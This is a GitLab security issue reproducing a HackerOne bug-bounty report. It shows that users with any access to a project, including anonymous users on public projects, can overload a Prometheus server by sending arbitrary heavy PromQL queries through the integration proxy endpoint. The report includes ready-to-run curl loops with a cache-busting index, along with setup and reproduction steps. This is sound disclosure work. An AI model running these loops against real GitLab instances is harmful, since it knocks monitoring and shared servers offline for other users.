DoS and high resource consumption of the Prometheus server through abuse of the Prometheus integration proxy endpoint
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1723124 by joaxcar
on 2022-10-04, assigned to @truegreg:
Report | Attachments | How To Reproduce
Report
This report is similar to my other report https://hackerone.com/reports/1723106, but the two endpoints grafana/proxy and prometheus/proxy are different and execute similar but distinct code paths in the backend. They also have different use cases that might make the fixes differ. I therefore report them separately, but feel free to link the two if that makes handling easier.
Summary
I am no Prometheus expert, so the described scenario can probably be expanded and improved upon (from a DoS perspective). But I did force my Docker container with 16 cores to run at a constant 100% CPU with only 20 requests (the requests are asynchronous, meaning that the connection from the attacker to GitLab succeeds while the connection between GitLab and Prometheus persists). While the attack was running, I could not stop Prometheus from the terminal with gitlab-ctl stop prometheus
as the service was unresponsive, and a gitlab-ctl restart
did not fix it. I had to stop the Docker container to make it stop. The impact of the attack depends somewhat on the amount of data on the Prometheus server, but as I only tested this on my localhost GitLab Prometheus server, it is almost empty compared to real-life servers.
Prometheus feature
A user can configure a Prometheus integration and add custom queries that show up in the metrics panel of any environment.
See https://docs.gitlab.com/ee/user/project/integrations/prometheus.html for info on the integration
See https://docs.gitlab.com/ee/operations/metrics/ for environment metrics
A configured environment will get a Prometheus proxy at https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range
Custom metrics are configured by a maintainer of the project, but any user with ANY access to the project can run arbitrary queries against the query_range endpoint.
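For reference, a normal use of the proxy looks roughly like this; the project path, environment id, and the up metric are placeholders, and the parameters are the same query, start_time, end_time, and step used throughout this report:
now=$(date +%s)   # current Unix timestamp
curl "https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range?query=up&start_time=$((now - 3600))&end_time=${now}&step=60"   # query the last hour in 60-second steps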
The setup
I booted up a GitLab Omnibus instance in a Docker container; this includes a Grafana instance (https://gitlab.example.com/-/grafana) and a Prometheus instance (http://localhost:9090). I also configured SSL and a DNS record for my server (spoofed via the hosts file).
The Grafana instance already has the Prometheus instance as a datasource, so it is possible to use this instance for testing. I then configured the Grafana integration in a public project, following https://docs.gitlab.com/ee/operations/metrics/embed_grafana.html .
You might need to run the server for a while to get some data into Prometheus. After a fresh boot, I used Burp to run a scan against my localhost GitLab instance to fill the server with HTTP requests; I did this twice, 24 hours apart.
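For completeness, the container was started roughly as the Docker install docs describe; the hostname and volume paths below are assumptions, so adjust them to your environment:
docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 --publish 22:22 \
  --name gitlab \
  --volume /srv/gitlab/config:/etc/gitlab \
  --volume /srv/gitlab/logs:/var/log/gitlab \
  --volume /srv/gitlab/data:/var/opt/gitlab \
  gitlab/gitlab-ee:latest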
The attack
As an unauthenticated user, I can now DoS the Prometheus server (and possibly also affect the overall system state of the Docker instance) by running this command in a terminal:
for index in {1..20}
do
curl 'https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'
done
To get it working, you might need to modify start_time and end_time to something relevant (use date +%s in a terminal to get the current timestamp). If 20 requests are not enough, try increasing the number.
Inside the Docker container, run htop or top to monitor the CPU.
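If you prefer not to hard-code the window, the timestamps can be computed on the fly; this is a small sketch assuming GNU date and procps inside the Omnibus container, and the 6-hour window is arbitrary:
end_time=$(date +%s)                  # now
start_time=$((end_time - 21600))      # 6 hours ago
echo "start_time=$start_time end_time=$end_time"
top -p "$(pgrep -d, prometheus)"      # pin top to the Prometheus process(es)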
Some details
Pulled apart, the anatomy of the request looks like this:
https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range <-- The project proxy endpoint
?query= <-- Start of query
<-- An expensive query, just a mess that I made up trying to eat resources -->
min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100
$index <-- Index used as cache buster
h%5D)))&start_time=1654749435&end_time=1654771035&step=15
It is important to note that the query is arbitrary; I just tried to construct one heavy enough to tip over the server, and it could probably be made far heavier. Also note the use of $index
in the query: this is a "cache buster", needed because the GitLab backend will not run multiple queries against Prometheus if the query is identical.
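For readability, the URL-decoded PromQL looks like this, with $index spliced into the last range selector as the cache buster:
min_over_time(api_requests_total[1000h]) % max_over_time(http_requests_total[1000h]) % histogram_quantile(0.9, sum by (job) (rate(http_requests_total{job=~".+"}[100${index}h])))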
Result
Here is a video showing the query being run against my local server:
Steps to reproduce
(If you have another Prometheus instance available, you can use that one for testing. I will describe the attack using the Docker GitLab Omnibus image.)
- Boot up a Docker container of the latest GitLab Omnibus (see https://docs.gitlab.com/ee/install/docker.html)
- Log in as admin, go to http://gitlab.example.com/admin/application_settings/network, and expand Outbound requests
- Enable requests from webhooks and services to localhost (this is needed to be able to use the built-in Prometheus instance)
- Create a new project on the GitLab instance
- Go to http://gitlab.example.com/GROUP/PROJECT/-/settings/integrations/prometheus/edit and enable the integration. Use the server http://localhost:9090
- Go to http://gitlab.example.com/GROUP/PROJECT/-/environments and create an environment
- Now make sure to load the Prometheus instance with some data. Make a bunch of requests to the GitLab instance over a period of time
- Open a terminal and get a shell in the Docker container, e.g. docker exec -it gitlab /bin/bash
- Run top to monitor the CPU level
- Now open another terminal and run date +%s
- Take the current timestamp and update start_time and end_time in the script below (see also the consolidated sketch after this list)
for index in {1..100}
do
curl 'https://gitlab.example.com/group1/project1/-/environments/1/prometheus/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'
done
- Run it and watch the CPU in top. If there is enough data in the instance, all processors should spike to 100%
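For convenience, here is the same loop as a self-contained sketch that computes start_time and end_time automatically; GITLAB_URL, the project path, and the environment id are assumptions that need to be adjusted to the target instance:
GITLAB_URL='https://gitlab.example.com'
PROJECT='group1/project1'            # project with the Prometheus integration
ENV_ID=1                             # id of the configured environment
end_time=$(date +%s)                 # now
start_time=$((end_time - 21600))     # 6-hour window ending now
QUERY='min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'
for index in {1..100}
do
  curl -s -o /dev/null "${GITLAB_URL}/${PROJECT}/-/environments/${ENV_ID}/prometheus/api/v1/query_range?query=${QUERY}${index}h%5D)))&start_time=${start_time}&end_time=${end_time}&step=15"   # each iteration changes the cache buster
done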
Impact
DoS and high resource consumption on the Prometheus server
What is the current bug behavior?
No special permissions are required to run arbitrary queries against the Prometheus server, even though only maintainers are allowed to configure "custom queries".
There are two issues. First, any user with any access to the project can execute arbitrary queries (including unauthenticated users on public projects). Second, since the queries are arbitrary, they can be as complex as the attacker wants and can thus break the Prometheus server.
What is the expected correct behavior?
Queries should be restricted to the configured ones.
Output of checks
This bug happens on GitLab.com
Results of GitLab environment info
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version:6.4.2
Go Version: unknown
GitLab information
Version: 15.4.0-ee
Revision: abbda55531f
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: http://gitlab2.joaxcar.com
HTTP Clone URL: http://gitlab2.joaxcar.com/some-group/some-project.git
SSH Clone URL: git@gitlab2.joaxcar.com:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.10.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: